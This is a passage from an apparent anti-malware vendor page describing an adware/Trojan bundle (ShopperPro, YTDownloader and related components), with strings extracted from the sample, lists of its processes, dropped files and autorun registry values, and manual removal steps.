sxs.dll
Obtain a full version, purchase a license at hXXp://boxedapp.com/boxedappsdk/order.html
%s_%.8x_%.8x_%.8x
.config
3, 3, 5, 12
BoxedApp, BoxedApp SDK, BoxedApp Packer, BoxedApp.com and some others are trademarks (some of them are registered) of Softanics
BoxedAppSDK.dll






Remove it with Ad-Aware




    

  1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. 

  2. Update the definition files.
    3. 

  3. Run a full scan of your computer.
    4. 





Manual removal*




    

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):
    

    BROWSE~2.EXE:3920
    ins_geforce.exe:2072
    ShopperPro.exe:3444
    9ba9693.exe:2936
    ins_shopperpro.:540
    Vxsysrohsgnosa.exe:3856
    regsvr32.exe:3680
    ping.exe:4080
    ping.exe:3592
    ping.exe:3920
    ping.exe:3900
    ping.exe:3776
    ping.exe:2296
    ping.exe:4016
    ping.exe:2472
    ping.exe:3672
    ping.exe:3148
    ping.exe:2960
    ping.exe:4008
    ping.exe:1544
    ping.exe:1540
    ping.exe:3364
    ping.exe:3692
    ping.exe:1652
    ping.exe:548
    ping.exe:2240
    ping.exe:4044
    ping.exe:3452
    ping.exe:3600
    ping.exe:2460
    ping.exe:3912
    ping.exe:2284
    ping.exe:3136
    ping.exe:4036
    ping.exe:2972
    ping.exe:3312
    ping.exe:3884
    ping.exe:3784
    ping.exe:3460
    ping.exe:2232
    ping.exe:3372
    ping.exe:4072
    net.exe:3368
    net.exe:2624
    %original file name%.exe:1076
    %original file name%.exe:1704
    %original file name%.exe:460
    %original file name%.exe:1980
    %original file name%.exe:264
    ins_sense.exe:2100
    sc.exe:2344
    sc.exe:3936
    setup.exe:3084
    setup.exe:3256
    Smskc.exe:3904
    net1.exe:3800
    net1.exe:2732
    tcpsvcs.exe:756
    0ead95b.exe:2928
    

    2. 

  2. Delete the original Trojan file.
    3. 

  3. Delete or disinfect the following files created/modified by the Trojan:
    

    %WinDir%\Tasks\ShopperPro.job (2150 bytes)
    %Documents and Settings%\All Users\Application Data\ShopperPro\config.json (488 bytes)
    %Documents and Settings%\All Users\Application Data\ShopperPro\ShopperPro.dll (2321 bytes)
    %Documents and Settings%\All Users\Application Data\ShopperPro\ShopperPro64.dll (3361 bytes)
    %Program Files%\ShopperPro\config.json (488 bytes)
    %Documents and Settings%\All Users\Application Data\ShopperPro\database1_0_0.ej (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsgD.tmp\hhmip.dll (2040 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsgD.tmp\Vxsysrohsgnosa.exe (1214930 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsgD.tmp\krkdagll.dll (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsgD.tmp\yllbd.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\25213.bat (407 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsgD.tmp\Syuzm.tmp (341417 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\snsch7[1].exe_e (129336 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\snsch7[1].exe_d (129336 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\snsch7[1].exe_a (129336 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\snsch7[1].exe_c (129336 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\snsch7[1].exe_b (129336 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx3.tmp\NK.lky (16 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx2.tmp (86827 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx3.tmp\setup.exe (869966 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx3.tmp\setup1.exe (79085 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsx3.tmp\D1958.dll (14 bytes)
    %Program Files%\Sense\761d4877-9cd4-4df2-ba2a-b233e898173d-5.exe (7726 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\System.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\yllbd.dll (11 bytes)
    %WinDir%\Tasks\761d4877-9cd4-4df2-ba2a-b233e898173d-5.job (72 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\452330 (9292 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\cuwdhtg.dll (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\qyahrzef.dll (29256 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\wxabgab.dll (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\krkdagll.dll (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\355497 (39553 bytes)
    %Program Files%\Sense\utils.exe (65500 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ipgeoapi[1] (40 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
    %Program Files%\Sense\Uninstall.exe (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\kpusqxa.dll (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsd12.tmp\ztfkyrh.dll (3616 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsc11.tmp (541698 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Install_14684\bxsdk32.dll (2386 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Install_14684\ins_geforce.exe (1497 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Install_14684\ins_sense.exe (1501 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Install_14684\ins_shopperpro.exe (31368 bytes)
    %Program Files%\YTDownloader\libeay32.dll (25608 bytes)
    %WinDir%\Tasks\YTDownloader.job (942 bytes)
    %Program Files%\YTDownloader\rtmpdump.exe (14285 bytes)
    %Program Files%\YTDownloader\YTDownloader.exe (44437 bytes)
    %Program Files%\YTDownloader\DownloadAPI.dll (48358 bytes)
    %Program Files%\YTDownloader\Unelevate.exe (2752 bytes)
    %Program Files%\YTDownloader\BrowserHelper.exe (11027 bytes)
    %Program Files%\YTDownloader\YTD-icon-128x128.png (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsf17.tmp\System.dll (11 bytes)
    %Program Files%\YTDownloader\BrowserHelperSrv.exe (4233 bytes)
    %Program Files%\YTDownloader\Updater.exe (17866 bytes)
    %Program Files%\YTDownloader\download_ani.gif (9 bytes)
    %Program Files%\YTDownloader\DownloadHelper.exe (10774 bytes)
    %Program Files%\YTDownloader\AniGIF.ocx (5635 bytes)
    %Documents and Settings%\%current user%\Desktop\YTDownloader.lnk (1 bytes)
    %Program Files%\YTDownloader\ssleay32.dll (4079 bytes)
    %Program Files%\YTDownloader\convert_aniBW.gif (7 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\YTDownloader\YTDownloader.lnk (1 bytes)
    %Program Files%\YTDownloader\sbmntr.sys (28 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsf17.tmp\AccDownload.dll (9226 bytes)
    %Program Files%\Common Files\System\SysMenu.dll (15201 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsf17.tmp\nsProcess.dll (4 bytes)
    %Program Files%\YTDownloader\YTDUninstall.exe (19904 bytes)
    %Program Files%\YTDownloader\Download_completed.ico (1 bytes)
    %Program Files%\YTDownloader\convert_ani.gif (765 bytes)
    %Program Files%\YTDownloader\converter.exe (61450 bytes)
    %WinDir%\Tasks\YTDownloaderUpd.job (912 bytes)
    %Program Files%\ShopperPro\Updater.exe (25776 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsb9.tmp\MoreInfo.dll (7 bytes)
    %Program Files%\ShopperPro\database1_0_0.json (4 bytes)
    %Documents and Settings%\All Users\Documents\ShopperPro\JsDriver\Config.xml (1 bytes)
    %Program Files%\ShopperPro\SPRemove.exe (20416 bytes)
    %Program Files%\ShopperPro\FireFox\chrome.manifest (113 bytes)
    %Program Files%\ShopperPro\FireFox\content\overlay.xul (203 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsl8.tmp (158611 bytes)
    %Program Files%\ShopperPro\JSDriver\jsdrv.exe (100378 bytes)
    %Program Files%\ShopperPro\ShopperPro64.dll (18424 bytes)
    %Program Files%\ShopperPro\JSDriver\jsdrv.sys (1552 bytes)
    %Program Files%\ShopperPro\ShopperPro.dll (15536 bytes)
    %Program Files%\ShopperPro\FireFox\install.rdf (828 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsb9.tmp\nsProcess.dll (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsb9.tmp\AccDownload.dll (9320 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsb9.tmp\System.dll (11 bytes)
    %Program Files%\ShopperPro\FireFox\content\shopperpro_128.png (5 bytes)
    %Program Files%\ShopperPro\manifest.json (595 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsb9.tmp\jsdrv.exe (100378 bytes)
    %Program Files%\ShopperPro\ShopperPro.exe (33633 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsb9.tmp\nsB.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsb9.tmp\nsExec.dll (6 bytes)
    %WinDir%\Tasks\ShopperProJSUpd.job (888 bytes)
    %Program Files%\ShopperPro\database1_0_0.ej (6 bytes)
    %Program Files%\ShopperPro\FireFox\content\overlay.js (13 bytes)
    %Program Files%\Ge-Force\fca20dba-4ecb-4c27-af30-29134a166813-5.exe (7547 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\vbsqyfj.dll (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\btqiknpx.dll (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\kbkvm.dll (3312 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\qoozvalm.dll (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\yfovh.dll (28288 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\413541 (8876 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\System.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\ipgeoapi[2] (40 bytes)
    %Program Files%\Ge-Force\Uninstall.exe (601 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\lxpnxblef.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\18420 (38869 bytes)
    %Program Files%\Ge-Force\utils.exe (71855 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsu15.tmp\wgldbpigk.dll (6 bytes)
    %WinDir%\Tasks\fca20dba-4ecb-4c27-af30-29134a166813-5.job (72 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj14.tmp (567693 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj6.tmp\setup1.exe (229796 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj6.tmp\NK.lky (16 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj6.tmp\setup.exe (2555480 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsj6.tmp\D1958.dll (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst5.tmp (240925 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup[1].exe_e (130347 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup[1].exe_d (130347 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup[1].exe_c (130347 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup[1].exe_b (130347 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\setup[1].exe_a (130347 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsrF.tmp\Lyqdtqcl.tmp (347770 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsrF.tmp\Smskc.exe (1247400 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsrF.tmp\auhdqaj.dll (2021 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsrF.tmp\qoozvalm.dll (14 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsrF.tmp\lxpnxblef.dll (11 bytes)
    

    4. 

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):
    

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "YTDownloader" = "%Program Files%\YTDownloader\YTDownloader.exe /boot"

    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "YTDownloader" = "%Program Files%\YTDownloader\YTDownloader.exe /boot"
    

    5. 

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    6. 

  6. Reboot the computer.
    7. 



*Manual removal may cause unexpected system behaviour and should be performed at your own risk.












 
 




 
No votes yet












				


							


			

				
					  
							

		

		


					
							

	

	
	        


	

        
      
 

      
      

      
    
 

    
  
 

		


		

		
			

			

				

					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				

				

					© 2026 Lavasoft. All rights reserved.

					Terms Of Use |   Privacy Policy
					


								

			


		

		


	

	
	

	

		x
		
Our best antivirus yet!

		
Fresh new look. Faster scanning. Better protection.

		

			
Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

			
For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

			
			Download adaware antivirus 12
		

		No thanks, continue to lavasoft.com
	

	

		

			close x
			
Discover the new adaware antivirus 12

			
Our best antivirus yet

			Download Now